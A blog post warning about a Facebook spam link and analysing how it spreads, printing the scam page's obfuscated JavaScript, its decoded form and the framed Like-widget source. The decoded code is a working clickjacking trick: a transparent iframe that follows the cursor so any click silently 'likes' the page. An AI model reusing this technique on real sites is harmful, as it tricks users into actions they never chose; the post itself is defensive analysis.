Facebook spam-link

Please be aware of a malicious link making rounds on Facebook. The title is:

The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED

The link leads to hxxp://thecraziesttattoos.blogspot.com/ which shows an image, purposely mimicking an add. If you click the ‘Skip this add’ or anywhere on the image you are redirected to; hxxp://ly9.net/4/4jsVF3 (which resolves to: hxxp://allhqpics.com/the-craziest-tat-youll-ever-see.html)

On that page you will see yet another image asking you to acknowledge you are, or are over 18. Clicking anywhere on that image will actually instruct Facebook you like that page – and that will post it on your wall. Your friends then click on it – and so on.

More information after the link (geek-alert!)

The code on hxxp://allhqpics.com/the-craziest-tat-youll-ever-see.html is quite cleverly constructed. The actual source of that HTML file is:

Source

<head>
<title>The SHOCKING TATTOO That Got This Girls PARENTS ARRESTED!!</title>
<script src=”jquery.js” type=”text/javascript”></script>
<script src=”top10.js” type=”text/javascript”></script>
</head>
<body>
<center><img src=”18.png”></center>
<script src=”bottom.js” type=”text/javascript”></script>
</body>

The referenced bottom.js contains the follow escaped Javascript:

Escaped bottom.js

<!–

document.write(unescape(‘%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%
67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%
30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%
30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%63%63%65%73%73%2E%69%6D%
2F%37%2F%6A%63%70%53%74%34%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%
64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%
20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%
65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%
20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%
72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3
D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62
%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%
70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%
20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%
66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%
79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%
2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%
4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%
2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%
79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%
6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%
29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%
69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%
63%72%69%70%74%3E’));

//–>

When unescaped the following code is revealed;

<!–

document.write(unescape(‘<div style=”overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;” id=”icontainer”>
<iframe src=”hxxp://access.im/7/jcpSt4″ scrolling=”no” frameborder=”0″ style=”border:none; overflow:hidden; width:50px; height:23px;” allowTransparency=”true” id=”fbframe” name=”fbframe”></iframe>
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById(‘icontainer’);
var standardbody=(document.compatMode==”CSS1Compat”)? document.documentElement : document.body //create reference to common “body” across doctypes

function mouseFollower(e){

/* DO NOT EDIT THIS */

if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+’px’;
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+’px’;
}

else

{

icontainer.style.top = (e.pageY-5)+’px’;
icontainer.style.left = (e.pageX-5)+’px’;

}

}

document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}

else

{
icontainer.style.display = ‘none’; }

}

</script>’));
//–>

As you can see it refers to hxxp://access.im/7/jcpSt4. That page has the following source:

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Strict//EN”
“http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml” xml:lang=”nl” lang=”nl” id=”facebook”>
<head>
<meta http-equiv=”Content-type” content=”text/html; charset=utf-8″ />
<meta http-equiv=”Content-language” content=”nl” />
<script type=”text/javascript”>
//<![CDATA[
CavalryLogger=false;window._is_quickling_index="";
//]]>
</script><noscript> <meta http-equiv=refresh content=”0; URL=?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp%3Blayout=standard&amp;amp%3Bshow_faces=false&amp;amp%3Bwidth=450&amp;amp%3Baction=like&amp;amp%3Bfont=tahoma&amp;amp%3Bcolorscheme=light&amp;amp%3Bheight=80&amp;_fb_noscript=1″ /> </noscript>
<meta name=”robots” content=”noodp,noydir” />
<meta name=”description” content=” Facebook is een sociaal netwerk dat vrienden, collega&#039;s, studiegenoten en kennissen met elkaar in contact brengt. Gebruik Facebook om op de hoogte te blijven van hoe het met je vrienden gaat, om onbeperkt foto&#039;s te uploaden, links en video&#039;s uit te wisselen en meer te weten te komen over de mensen die je ontmoet.” />
<link rel=”alternate” media=”handheld” href=”http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp%3Blayout=standard&amp;amp%3Bshow_faces=false&amp;amp%3Bwidth=450&amp;amp%3Baction=like&amp;amp%3Bfont=tahoma&amp;amp%3Bcolorscheme=light&amp;amp%3Bheight=80″ />
<link type=”text/css” rel=”stylesheet” href=”http://static.ak.fbcdn.net/rsrc.php/z9V3V/hash/cn4ut1mh.css” />
<script type=”text/javascript” src=”http://b.static.ak.fbcdn.net/rsrc.php/z78UV/hash/abtj54l6.js”></script>
<title>The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED | Facebook</title></head><body><div id=”FB_HiddenContainer” style=”position:absolute; top:-10000px; width:0px; height:0px;” ></div><div id=”connect_widget_4c2f1e4c211ae5e7d0191″><table><tr><td><div><div><a><span>Vind ik leuk</span></a></div></div></td><td><div><div><span style=”"></span><span><span>Jij en 4.494 anderen vinden dit leuk.</span><span>4.494 personen vinden dit leuk.</span><span>&nbsp;&middot;&nbsp;<a>Beheerderspagina</a></span><span>&nbsp;&middot;&nbsp;<a>Fout</a></span><span><a href=”#”>Vind ik niet leuk</a></span></span></div><div><span>Je vindt <b>The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED</b> leuk.</span></div></div></td></tr></table><div></div></div><script type=”text/javascript”>
Env={module:”like_widget”,impid:”c29bdf52″,user:0,locale:”nl_NL”,method:”GET”,dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:262076,vip:”66.220.147.44″,static_base:”http:\/\/static.ak.fbcdn.net\/”,www_base:”http:\/\/www.facebook.com\/”,tlds:["com"],rep_lag:2,pc:{“m”:”1.0.4″,”l”:”1.0.4″,”axi”:true,”j”:true,”bsz”:16},fb_dtsg:”4hbEx”,lhsh:”7b555S0gTjO7Ys4xJtZKuBAfETw”,silent_oops_errors:”1″};
</script>
<script type=”text/javascript”>Bootloader.setResourceMap({“WZ0fA”:{“name”:”js\/3mzx17quneyo8kc4.pkg.js”,”type”:”js”,”src”:”http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zB4BM\/hash\/d1w9lhbq.js”},”uCKJ8″:{“name”:”css\/dr0uq2rbrrww0cgc.pkg.css”,”type”:”css”,”permanent”:1,”src”:”http:\/\/static.ak.fbcdn.net\/rsrc.php\/z9V3V\/hash\/cn4ut1mh.css”},”F+B8D”:{“name”:”js\/19khsprwvtvokwow.pkg.js”,”type”:”js”,”src”:”http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z78UV\/hash\/abtj54l6.js”},”NJtdf”:{“name”:”js\/lib\/net\/async_postlude.js”,”type”:”js”,”src”:”http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2ATW\/hash\/835vzsrg.js”}});
Bootloader.enableBootload({“async”:["F+B8D","WZ0fA","uCKJ8"],”dialog”:["F+B8D","WZ0fA","uCKJ8"],”dom-form”:["F+B8D","WZ0fA","uCKJ8"],”async-postlude”:["F+B8D","WZ0fA","uCKJ8","NJtdf"],”vector”:["F+B8D","WZ0fA"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function(){setTimeout(function() {InitialJSLoader.load(["WZ0fA"]);Arbiter.inform(“BOOTLOAD\/ROADRUNNER_READY”, true, Arbiter.BEHAVIOR_STATE);}, 50)}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);</script><script type=”text/javascript”>
onloadRegister(function(){Bootloader.configurePage(["uCKJ8"]);});
Bootloader.done(["uCKJ8"]);
onloadRegister(function (){window.__UIControllerRegistry["c4c2f1e4c2153e615066df"] = new ExternalPageLikeWidget({“viewer”:0,”channelURL”:”",”nodeType”:”link”,”externalURL”:”http:\/\/thecraziesttattoos.blogspot.com\/”,”pageId”:null,”widgetID”:”connect_widget_4c2f1e4c211ae5e7d0191″,”alreadyConnected”:false,”viewerIsAdmin”:false,”adminUrl”:”",”showFaces”:true,”useUnlikeLink”:false,”layout”:”standard”,”commentWidgetMarkup”:”",”error”:null,”autoResize”:true,”actionText”:null,”abtestunlike”:false,”userOptedOut”:false,”showCaptcha”:false,”isBlocked”:false}); ;;});
onloadRegister(function (){try {document.execCommand(“BackgroundImageCache”, false, true);} catch (ignored) {};});
</script></body>
</html>

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Strict//EN”   “http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd”><html xmlns=”http://www.w3.org/1999/xhtml” xml:lang=”nl” lang=”nl” id=”facebook”><head><meta http-equiv=”Content-type” content=”text/html; charset=utf-8″ /><meta http-equiv=”Content-language” content=”nl” /><script type=”text/javascript”>//<![CDATA[CavalryLogger=false;window._is_quickling_index="";//]]></script><noscript> <meta http-equiv=refresh content=”0; URL=?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp%3Blayout=standard&amp;amp%3Bshow_faces=false&amp;amp%3Bwidth=450&amp;amp%3Baction=like&amp;amp%3Bfont=tahoma&amp;amp%3Bcolorscheme=light&amp;amp%3Bheight=80&amp;_fb_noscript=1″ /> </noscript>
<meta name=”robots” content=”noodp,noydir” /><meta name=”description” content=” Facebook is een sociaal netwerk dat vrienden, collega&#039;s, studiegenoten en kennissen met elkaar in contact brengt. Gebruik Facebook om op de hoogte te blijven van hoe het met je vrienden gaat, om onbeperkt foto&#039;s te uploaden, links en video&#039;s uit te wisselen en meer te weten te komen over de mensen die je ontmoet.” /><link rel=”alternate” media=”handheld” href=”http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp%3Blayout=standard&amp;amp%3Bshow_faces=false&amp;amp%3Bwidth=450&amp;amp%3Baction=like&amp;amp%3Bfont=tahoma&amp;amp%3Bcolorscheme=light&amp;amp%3Bheight=80″ />
<link type=”text/css” rel=”stylesheet” href=”http://static.ak.fbcdn.net/rsrc.php/z9V3V/hash/cn4ut1mh.css” />
<script type=”text/javascript” src=”http://b.static.ak.fbcdn.net/rsrc.php/z78UV/hash/abtj54l6.js”></script><title>The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED | Facebook</title></head><body><div id=”FB_HiddenContainer” style=”position:absolute; top:-10000px; width:0px; height:0px;” ></div><div id=”connect_widget_4c2f1e4c211ae5e7d0191″><table><tr><td><div><div><a><span>Vind ik leuk</span></a></div></div></td><td><div><div><span style=”"></span><span><span>Jij en 4.494 anderen vinden dit leuk.</span><span>4.494 personen vinden dit leuk.</span><span>&nbsp;&middot;&nbsp;<a>Beheerderspagina</a></span><span>&nbsp;&middot;&nbsp;<a>Fout</a></span><span><a href=”#”>Vind ik niet leuk</a></span></span></div><div><span>Je vindt <b>The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED</b> leuk.</span></div></div></td></tr></table><div></div></div><script type=”text/javascript”>Env={module:”like_widget”,impid:”c29bdf52″,user:0,locale:”nl_NL”,method:”GET”,dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:262076,vip:”66.220.147.44″,static_base:”http:\/\/static.ak.fbcdn.net\/”,www_base:”http:\/\/www.facebook.com\/”,tlds:["com"],rep_lag:2,pc:{“m”:”1.0.4″,”l”:”1.0.4″,”axi”:true,”j”:true,”bsz”:16},fb_dtsg:”4hbEx”,lhsh:”7b555S0gTjO7Ys4xJtZKuBAfETw”,silent_oops_errors:”1″};</script>
<script type=”text/javascript”>Bootloader.setResourceMap({“WZ0fA”:{“name”:”js\/3mzx17quneyo8kc4.pkg.js”,”type”:”js”,”src”:”http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zB4BM\/hash\/d1w9lhbq.js”},”uCKJ8″:{“name”:”css\/dr0uq2rbrrww0cgc.pkg.css”,”type”:”css”,”permanent”:1,”src”:”http:\/\/static.ak.fbcdn.net\/rsrc.php\/z9V3V\/hash\/cn4ut1mh.css”},”F+B8D”:{“name”:”js\/19khsprwvtvokwow.pkg.js”,”type”:”js”,”src”:”http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z78UV\/hash\/abtj54l6.js”},”NJtdf”:{“name”:”js\/lib\/net\/async_postlude.js”,”type”:”js”,”src”:”http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2ATW\/hash\/835vzsrg.js”}});Bootloader.enableBootload({“async”:["F+B8D","WZ0fA","uCKJ8"],”dialog”:["F+B8D","WZ0fA","uCKJ8"],”dom-form”:["F+B8D","WZ0fA","uCKJ8"],”async-postlude”:["F+B8D","WZ0fA","uCKJ8","NJtdf"],”vector”:["F+B8D","WZ0fA"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function(){setTimeout(function() {InitialJSLoader.load(["WZ0fA"]);Arbiter.inform(“BOOTLOAD\/ROADRUNNER_READY”, true, Arbiter.BEHAVIOR_STATE);}, 50)}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);</script><script type=”text/javascript”>
onloadRegister(function(){Bootloader.configurePage(["uCKJ8"]);});Bootloader.done(["uCKJ8"]);

onloadRegister(function (){window.__UIControllerRegistry["c4c2f1e4c2153e615066df"] = new ExternalPageLikeWidget({“viewer”:0,”channelURL”:”",”nodeType”:”link”,”externalURL”:”http:\/\/thecraziesttattoos.blogspot.com\/”,”pageId”:null,”widgetID”:”connect_widget_4c2f1e4c211ae5e7d0191″,”alreadyConnected”:false,”viewerIsAdmin”:false,”adminUrl”:”",”showFaces”:true,”useUnlikeLink”:false,”layout”:”standard”,”commentWidgetMarkup”:”",”error”:null,”autoResize”:true,”actionText”:null,”abtestunlike”:false,”userOptedOut”:false,”showCaptcha”:false,”isBlocked”:false}); ;;});onloadRegister(function (){try {document.execCommand(“BackgroundImageCache”, false, true);} catch (ignored) {};});

</script></body></html>

Within that code you will see that it tries to load your Facebook profile, and since you clicked on the image, stating you are over 18 – you automatically ‘like’ the link, which will be shown on your feed.

Other friends see the link on your wall, click on it and it continues with them.

Be safe, and don’t click on links that you do not trust, even from friends!

Note;

The link has been reported to the relevant people.

About Aprazeth

Aprazeth is a self proclaimed monkey running wild on the internet. Read his musings, and laugh at his rants...
This entry was posted in Geek Stuff and tagged , . Bookmark the permalink.

Comments are closed.